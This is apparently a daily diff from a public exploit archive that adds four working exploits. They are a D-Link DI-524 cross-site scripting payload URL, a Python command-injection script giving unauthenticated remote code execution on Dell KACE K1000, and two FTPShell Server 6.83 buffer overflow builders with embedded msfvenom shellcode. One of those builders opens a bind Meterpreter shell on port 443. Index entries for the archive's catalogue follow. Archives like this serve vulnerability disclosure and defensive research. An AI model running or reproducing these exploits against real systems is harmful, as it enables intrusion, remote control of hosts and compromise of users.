DB: 2019-04-11

4 changes to exploits/shellcodes

FTPShell Server 6.83 - 'Account name to ban' Local Buffer
FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer
Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution
D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting

exploits/hardware/webapps/46687.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Multiple Stored and Reflected XSS vulnerabilities in D-Link DI-524
+# Date: April 6, 2019
+# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
+# Vendor Homepage: https://www.dlink.com
+# Version: D-Link DI-524 - V2.06RU
+# CVE : CVE-2019-11017 
+
+To re-create Reflected XSS vulnerability, log in to the Web Configuration (default credentials are: "admin":"" without double quotes), and send GET request to the router with malformed vulnerable parameter:
+
+http://$IP/cgi-bin/smap?RC=@smap%22-$PAYLOAD-%22&rd=x&SEO=o&AC=O&SnO=1&SHO=2&StO=1&SpO=1&SPO=1
+
+Where $IP may be equal to "192.168.0.1", $PAYLOAD may be equal to "alert(document.location)".
+
+Stored XSS's were found in web forms on pages /spap.htm, /smap.htm. To inject malicious JavaScript to victim's webpage, an attacker should authorize on the router, then put a payload to any of the vulnerable forms, and wait, until victim opens router's web interface and goes to vulnerable page.
+
+I haven't tested all the admin panel of the router, so I can guess that there are other XSS vulnerabilities in this router.

exploits/php/webapps/46684.py

@@ -0,0 +1,24 @@
+#!/usr/bin/python
+# Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE
+# Version:       <= 6.4.120756
+# Date:          2019-04-09
+# Author:        Julien Ahrens (@MrTuxracer)
+# Software Link: https://www.quest.com/products/kace-systems-management-appliance/
+# Write-up:      https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
+# Note:          The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell.            
+#
+# Usage: python3 exploit.py https://localhost 'sleep 10'
+
+import requests
+import sys
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+target_url = sys.argv[1]
+payload = sys.argv[2]
+
+r = requests.post(target_url + '/service/krashrpt.php', data={
+    'kuid' : '`' + payload + '`'
+    }, verify=False)
+
+print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))

exploits/windows/local/46685.py

@@ -0,0 +1,50 @@
+#!/usr/bin/python
+# Exploit Title: FTP Shell Server 6.83 'Account name to ban' Buffer Overflow
+# Date: 09-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.ftpshell.com/index.htm
+# Version: 6.83
+# Software Link : http://www.ftpshell.com/downloadserver.htm
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# Initial DOS discovery by: Victor Mondragón
+# Created during 2019 intern training
+# Greetz Amy, Delicia, Greg, Tonderai, Nzanoa & Telspace Systems Crew
+# PoC:
+# 1.) Generate ftpshell.txt, copy the contents to clipboard
+# 2.) In the application, open 'Manage FTP Accounts' -> "Add Account Name"
+# 3.) Paste the contents of ftpshell.txt in "Account name to ban"
+# 4.) Click "OK" and calc pops
+#JMP ESP - 0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+
+
+#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a\x7d" -f c
+shellcode = ("\xdd\xc7\xb8\xa0\x9e\x31\x11\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x31\x31\x42\x18\x03\x42\x18\x83\xc2\xa4\x7c\xc4\xed\x4c\x02"
+"\x27\x0e\x8c\x63\xa1\xeb\xbd\xa3\xd5\x78\xed\x13\x9d\x2d\x01"
+"\xdf\xf3\xc5\x92\xad\xdb\xea\x13\x1b\x3a\xc4\xa4\x30\x7e\x47"
+"\x26\x4b\x53\xa7\x17\x84\xa6\xa6\x50\xf9\x4b\xfa\x09\x75\xf9"
+"\xeb\x3e\xc3\xc2\x80\x0c\xc5\x42\x74\xc4\xe4\x63\x2b\x5f\xbf"
+"\xa3\xcd\x8c\xcb\xed\xd5\xd1\xf6\xa4\x6e\x21\x8c\x36\xa7\x78"
+"\x6d\x94\x86\xb5\x9c\xe4\xcf\x71\x7f\x93\x39\x82\x02\xa4\xfd"
+"\xf9\xd8\x21\xe6\x59\xaa\x92\xc2\x58\x7f\x44\x80\x56\x34\x02"
+"\xce\x7a\xcb\xc7\x64\x86\x40\xe6\xaa\x0f\x12\xcd\x6e\x54\xc0"
+"\x6c\x36\x30\xa7\x91\x28\x9b\x18\x34\x22\x31\x4c\x45\x69\x5f"
+"\x93\xdb\x17\x2d\x93\xe3\x17\x01\xfc\xd2\x9c\xce\x7b\xeb\x76"
+"\xab\x74\xa1\xdb\x9d\x1c\x6c\x8e\x9c\x40\x8f\x64\xe2\x7c\x0c"
+"\x8d\x9a\x7a\x0c\xe4\x9f\xc7\x8a\x14\xed\x58\x7f\x1b\x42\x58"
+"\xaa\x78\x05\xca\x36\x51\xa0\x6a\xdc\xad")
+
+buffer = "A" * 416 + "\x3b\x69\x5a\x77" + "\x90" * 20 + shellcode + "C" * 80
+
+payload = buffer
+try:
+    f=open("ftpshell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/46686.py

@@ -0,0 +1,79 @@
+#!/usr/bin/python
+# Exploit Title: FTP Shell Server 6.83 'Virtual Path Mapping' Buffer Overflow
+# Date: 09-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.ftpshell.com/index.htm
+# Version: 6.83
+# Software Link : http://www.ftpshell.com/downloadserver.htm
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# Created during 2019 Intern Training
+# Greetz Amy, Delicia, Greg, Tonderai, Nzanoa & Telspace Systems Crew
+# PoC:
+# 1.) Generate ftpshell.txt, copy the contents to clipboard
+# 2.) In the application, open 'Manage FTP Accounts' -> "Configure Accounts" -> "Add Path"
+# 3.) Paste the contents of ftpshell.txt in "Virtual Path Mapping"
+# 4.) Click "OK" and you'll have a bind meterpreter shell on port 443
+#7E429353   FFE4             JMP ESP
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\xda\xc3\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
+"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c"
+"\x4a\x48\x6e\x62\x33\x30\x43\x30\x73\x30\x43\x50\x4f\x79\x6a"
+"\x45\x70\x31\x59\x50\x42\x44\x6e\x6b\x66\x30\x50\x30\x4c\x4b"
+"\x53\x62\x44\x4c\x4c\x4b\x31\x42\x64\x54\x4c\x4b\x54\x32\x35"
+"\x78\x34\x4f\x4d\x67\x43\x7a\x77\x56\x50\x31\x39\x6f\x6c\x6c"
+"\x47\x4c\x30\x61\x31\x6c\x76\x62\x36\x4c\x61\x30\x79\x51\x7a"
+"\x6f\x76\x6d\x77\x71\x59\x57\x4a\x42\x5a\x52\x32\x72\x76\x37"
+"\x6c\x4b\x46\x32\x34\x50\x6e\x6b\x30\x4a\x45\x6c\x4c\x4b\x30"
+"\x4c\x36\x71\x74\x38\x39\x73\x30\x48\x73\x31\x58\x51\x46\x31"
+"\x4c\x4b\x53\x69\x37\x50\x56\x61\x6b\x63\x6e\x6b\x32\x69\x42"
+"\x38\x68\x63\x65\x6a\x70\x49\x6e\x6b\x57\x44\x6e\x6b\x63\x31"
+"\x7a\x76\x54\x71\x6b\x4f\x4e\x4c\x4f\x31\x58\x4f\x34\x4d\x76"
+"\x61\x4f\x37\x45\x68\x4d\x30\x64\x35\x68\x76\x44\x43\x71\x6d"
+"\x7a\x58\x45\x6b\x53\x4d\x67\x54\x44\x35\x6a\x44\x32\x78\x6c"
+"\x4b\x50\x58\x37\x54\x63\x31\x6b\x63\x75\x36\x4e\x6b\x34\x4c"
+"\x70\x4b\x4e\x6b\x62\x78\x45\x4c\x35\x51\x69\x43\x6c\x4b\x76"
+"\x64\x6c\x4b\x66\x61\x68\x50\x4e\x69\x73\x74\x55\x74\x61\x34"
+"\x51\x4b\x33\x6b\x61\x71\x76\x39\x30\x5a\x36\x31\x6b\x4f\x6b"
+"\x50\x71\x4f\x51\x4f\x71\x4a\x4e\x6b\x65\x42\x38\x6b\x6c\x4d"
+"\x31\x4d\x70\x68\x75\x63\x70\x32\x63\x30\x47\x70\x42\x48\x54"
+"\x37\x53\x43\x76\x52\x71\x4f\x50\x54\x63\x58\x32\x6c\x34\x37"
+"\x77\x56\x54\x47\x49\x6f\x4e\x35\x68\x38\x7a\x30\x47\x71\x43"
+"\x30\x43\x30\x57\x59\x4a\x64\x46\x34\x56\x30\x35\x38\x74\x69"
+"\x4d\x50\x50\x6b\x57\x70\x39\x6f\x68\x55\x51\x7a\x54\x4b\x32"
+"\x79\x30\x50\x6d\x32\x4b\x4d\x72\x4a\x33\x31\x71\x7a\x43\x32"
+"\x72\x48\x58\x6a\x44\x4f\x79\x4f\x79\x70\x79\x6f\x5a\x75\x6c"
+"\x57\x55\x38\x73\x32\x67\x70\x63\x31\x4d\x6b\x6f\x79\x49\x76"
+"\x62\x4a\x62\x30\x61\x46\x42\x77\x75\x38\x6a\x62\x39\x4b\x45"
+"\x67\x35\x37\x79\x6f\x78\x55\x6e\x65\x39\x50\x62\x55\x71\x48"
+"\x31\x47\x55\x38\x4e\x57\x79\x79\x65\x68\x79\x6f\x49\x6f\x78"
+"\x55\x32\x77\x51\x78\x32\x54\x48\x6c\x75\x6b\x68\x61\x49\x6f"
+"\x38\x55\x51\x47\x6f\x67\x45\x38\x53\x45\x62\x4e\x50\x4d\x55"
+"\x31\x79\x6f\x39\x45\x72\x4a\x53\x30\x30\x6a\x33\x34\x52\x76"
+"\x36\x37\x73\x58\x64\x42\x48\x59\x69\x58\x53\x6f\x49\x6f\x38"
+"\x55\x4c\x43\x38\x78\x53\x30\x51\x6e\x76\x4d\x6e\x6b\x57\x46"
+"\x72\x4a\x51\x50\x61\x78\x67\x70\x36\x70\x75\x50\x33\x30\x30"
+"\x56\x31\x7a\x53\x30\x33\x58\x43\x68\x49\x34\x30\x53\x69\x75"
+"\x59\x6f\x6a\x75\x4a\x33\x46\x33\x43\x5a\x43\x30\x70\x56\x63"
+"\x63\x63\x67\x62\x48\x77\x72\x58\x59\x39\x58\x53\x6f\x4b\x4f"
+"\x49\x45\x4d\x53\x7a\x58\x55\x50\x43\x4e\x66\x67\x56\x61\x4b"
+"\x73\x46\x49\x69\x56\x74\x35\x6d\x39\x79\x53\x4d\x6b\x58\x70"
+"\x4d\x65\x6e\x42\x32\x76\x71\x7a\x65\x50\x56\x33\x69\x6f\x48"
+"\x55\x41\x41")
+
+buffer = "A" * 395 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode + "C" * 211
+
+payload = buffer
+try:
+    f=open("ftpshell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -10403,6 +10403,8 @@ id,file,description,date,author,type,platform,port
 46673,exploits/windows/local/46673.py,"Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow",2019-04-08,"Peyman Forouzan",local,windows,
 46676,exploits/linux/local/46676.php,"Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation",2019-04-08,cfreal,local,linux,
 46683,exploits/windows/local/46683.txt,"Microsoft Windows - AppX Deployment Service Privilege Escalation",2019-04-09,"Nabeel Ahmed",local,windows,
+46685,exploits/windows/local/46685.py,"FTPShell Server 6.83 - 'Account name to ban' Local Buffer",2019-04-10,"Dino Covotsos",local,windows,
+46686,exploits/windows/local/46686.py,"FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer",2019-04-10,"Dino Covotsos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41121,3 +41123,5 @@ id,file,description,date,author,type,platform,port
 46672,exploits/php/webapps/46672.js,"WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass",2019-04-08,isdampe,webapps,php,80
 46674,exploits/java/webapps/46674.txt,"ManageEngine ServiceDesk Plus 9.3 - User Enumeration",2019-04-08,"Alexander Bluestein",webapps,java,
 46681,exploits/php/webapps/46681.txt,"Ashop Shopping Cart Software - 'bannedcustomers.php?blacklistitemid' SQL Injection",2019-04-09,"Doğukan Karaciğer",webapps,php,80
+46684,exploits/php/webapps/46684.py,"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution",2019-04-10,"Julien Ahrens",webapps,php,443
+46687,exploits/hardware/webapps/46687.txt,"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting",2019-04-10,"Semen Alexandrovich Lyhin",webapps,hardware,80